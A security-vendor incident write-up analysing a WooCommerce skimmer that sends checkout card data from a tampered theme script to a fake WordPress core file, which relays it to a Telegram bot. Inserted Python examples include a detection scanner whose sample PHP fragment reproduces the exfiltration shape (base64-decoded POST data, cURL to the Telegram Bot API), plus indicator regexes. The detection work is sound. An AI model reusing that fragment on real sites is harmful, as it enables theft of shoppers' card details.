WooCommerce Credit Card Skimmer uses Telegram Bot to exfiltrate stolen data

Our story begins like many others told on this blog: a new customer reported to us about credit card theft on his e-commerce site.

The website owner had received complaints from several customers who reported fake transactions on their cards shortly after purchasing from their online store, so the webmaster suspected something was wrong.

Fortunately, our new client wasted no time looking for a solution and came to us for help almost immediately after receiving the complaints.

Let the investigation begin

The first thing we usually do when looking for credit card skimming malware is to inspect the payment page for suspicious content. It is very common with this type of infection that malicious JavaScript from strange third parties appears in the source code, and can be easily spotted using a script blocker browser extension.

In this case, no such resource was being loaded. A manual inspection of the source code of the payment page did not reveal anything abnormal. Our next step was to verify recently modified files and run a basic WordPress integrity check.
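The two checks mentioned above, as an added example that is not part of the original post: list files changed in the last few days and compare core directories against a checksum manifest, so that a look-alike file that was never part of WordPress stands out. The manifest is a constructed stand-in; a real run would load the JSON for the installed version from api.wordpress.org/core/checksums.

```python
import hashlib
import os
import tempfile
import time
from pathlib import Path

# Constructed stand-in for the WordPress core checksum manifest (assumption).
CORE_MD5 = {
    "wp-includes/feed-rss2-comments.php":
        hashlib.md5(b"<?php // genuine core file\n").hexdigest(),
}
CORE_DIRS = ("wp-includes", "wp-admin")


def audit_wordpress(root, days=3, manifest=CORE_MD5):
    """Return (recent, unknown, modified): paths changed in the last `days`
    days, core-directory files absent from the manifest, and manifest files
    whose hash no longer matches. All paths are relative to the site root."""
    root = Path(root)
    cutoff = time.time() - days * 86400
    recent, unknown, modified = [], [], []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.stat().st_mtime >= cutoff:
            recent.append(rel)
        if rel.split("/")[0] in CORE_DIRS:
            if rel not in manifest:
                unknown.append(rel)
            elif hashlib.md5(path.read_bytes()).hexdigest() != manifest[rel]:
                modified.append(rel)
    return sorted(recent), sorted(unknown), sorted(modified)


def build_demo_site(tmp):
    """Constructed site: one genuine core file, one look-alike that is not in
    the manifest, and a theme script last touched 30 days ago."""
    inc = Path(tmp) / "wp-includes"
    inc.mkdir(parents=True)
    (inc / "feed-rss2-comments.php").write_bytes(b"<?php // genuine core file\n")
    (inc / "feed-rss-comments.php").write_bytes(b"<?php // not a core file\n")
    theme = Path(tmp) / "wp-content" / "themes" / "storefront"
    theme.mkdir(parents=True)
    js = theme / "script.js"
    js.write_text("// theme script\n")
    old = time.time() - 30 * 86400
    os.utime(js, (old, old))  # make it look untouched for a month
    return tmp


def run_demo():
    with tempfile.TemporaryDirectory() as d:
        return audit_wordpress(build_demo_site(d))
```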

Recent environment changes

The first reported case of credit card theft on the site had only taken place three days previously, which greatly facilitated our work in terms of inspecting recent changes in the environment. When credit card theft issues go unaddressed for too long, malicious file changes can get buried in a sea of plugin updates and other benign website maintenance activity, making it more difficult to locate the payload.

A number of files were modified over the weekend, but we quickly located two that contained the credit card skimming payload:


Let’s take a look, shall we?

Payload Analysis

The first part of our credit card skimmer was located in the script.js file, a custom file added to the popular Storefront WooCommerce theme and included in the checkout page.

At the bottom of the file, we see this JavaScript snippet:

Malicious JavaScript sending stolen credit card data to a malicious PHP file.

What does it do? Although it looks incomplete, with what appears to be an empty function, we can see that it still sends a POST request when triggered by the “To order” button located on the payment page of the website.

A compromised checkout page in a WooCommerce environment.

The malicious script uses the btoa() JavaScript function to serialize and base64-encode the contents of the form. It then sends them to the feed-rss-comments.php file located in the wp-includes core files directory.

Wait a second, what do WordPress comments have to do with payment processing, and why would this script send the data to this file?

In fact, WooCommerce transaction data is stored in the wp_comments table as well as other locations, but that’s not exactly what was happening here.

Taking a look at the feed-rss-comments.php file reveals what is really going on:

A malicious PHP credit card theft script that exfiltrates data to the Telegram chat service.

As it turns out, feed-rss-comments.php is not a WordPress core file at all!

There is a WordPress core file in the same directory with a very similar name, feed-rss2-comments.php, but it certainly does not contain any of this code.

Looking at the code above, we can see that this bogus core file takes the information sent to it from the custom script.js file and performs the following actions:

  1. Receives the input given to it, adding user agent and IP address information
  2. Decodes the base64 encoded content
  3. Uses the Telegram API to send this content to a designated chat bot via cURL

So, every time an order was placed on the infected website, the credit card details were transferred to a Telegram chat room, where they were quickly sold on the black market, leading to fraudulent transactions on the victims’ credit cards.
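A small triage scanner for the three behaviours listed above, as an added example that is not part of the original post: it flags PHP files that combine a Telegram Bot API endpoint with base64 decoding, cURL, request input and client fingerprinting. The regexes and the two sample files are constructed for the demo (the bot token is a placeholder), and the thresholds are assumptions to tune for your own environment.

```python
import re

# Indicator regexes for the exfiltration pattern described in the post
# (assumed here; adjust before relying on them in production).
INDICATORS = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "curl": re.compile(r"\bcurl_(init|exec|setopt)\s*\(", re.I),
    "request_input": re.compile(r"\$_(POST|REQUEST|GET)\b|php://input", re.I),
    "client_fingerprint": re.compile(r"HTTP_USER_AGENT|REMOTE_ADDR"),
}

# Constructed samples: the shape of the bogus file (token redacted, nothing
# is sent) beside a benign stub standing in for the genuine core file.
SAMPLES = {
    "wp-includes/feed-rss-comments.php": """<?php
$data = base64_decode($_POST['data']);
$data .= $_SERVER['HTTP_USER_AGENT'] . ' ' . $_SERVER['REMOTE_ADDR'];
$ch = curl_init('https://api.telegram.org/bot<BOT_TOKEN>/sendMessage');
""",
    "wp-includes/feed-rss2-comments.php": """<?php
header('Content-Type: ' . feed_content_type('rss2'), true);
echo '<?xml version="1.0" encoding="' . get_option('blog_charset') . '"?>';
""",
}


def scan_php(source):
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def is_suspicious(source, min_hits=3):
    """A Telegram bot endpoint in a WordPress file is enough on its own;
    otherwise require several indicators together to limit false positives."""
    hits = scan_php(source)
    return "telegram_bot_api" in hits or len(hits) >= min_hits


def triage(files):
    """Map each path to its indicator hits, keeping only suspicious files."""
    return {path: scan_php(src) for path, src in files.items() if is_suspicious(src)}
```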

Telegram exfiltration moves to WooCommerce

Telegram is considered a useful service by attackers, given the encrypted nature of the communication service. It allows attackers to steal data while hiding behind a cloak of anonymity. Unlike most credit card exfiltrations we see, which send the data to a remote domain or IP address, scammers using Telegram cannot be tied to a specific location or server.

This is not the first time that Telegram has been used to exfiltrate stolen credit card details or other sensitive data. We have many existing blog posts documenting how the encrypted messaging service was used to harvest administrator login credentials through an infected wp-login.php file or to transfer data from phishing pages.

In recent years, other security researchers have also documented Telegram being used to exfiltrate stolen credit card details. It is now clear that such exfiltration methods also take place in at least one WooCommerce environment.

In conclusion

As we have written about on this blog, WordPress/WooCommerce has quickly become the leading CMS platform for credit card skimming malware, overtaking Magento and other purpose-built e-commerce platforms over the course of the last year.

In fact, according to our SiteCheck data, so far this year WordPress websites represent more than 60% of known credit card skimming malware detections:

A graph showing the CMS distribution of websites affected by the MageCart malware so far in 2022.

This represents an increase from approximately ⅓ of the previous year’s detections, as we reported in our 2021 Hacked Websites Report. We anticipate that exfiltration techniques documented for other platforms will continue to emerge for WooCommerce.

E-commerce website owners should take note and act accordingly to keep their websites and customer data secure:

  • Keep all software up to date with routine maintenance
  • Protect your admin panel from unauthorized access
  • Use strong passwords
  • Place your website behind a firewall service

It’s better to treat security as a high-priority issue early on than to wait until your environment is compromised.

If the worst comes to worst and you start receiving customer complaints about fraudulent transactions or stolen data, you can always count on us to help clean up the infection!
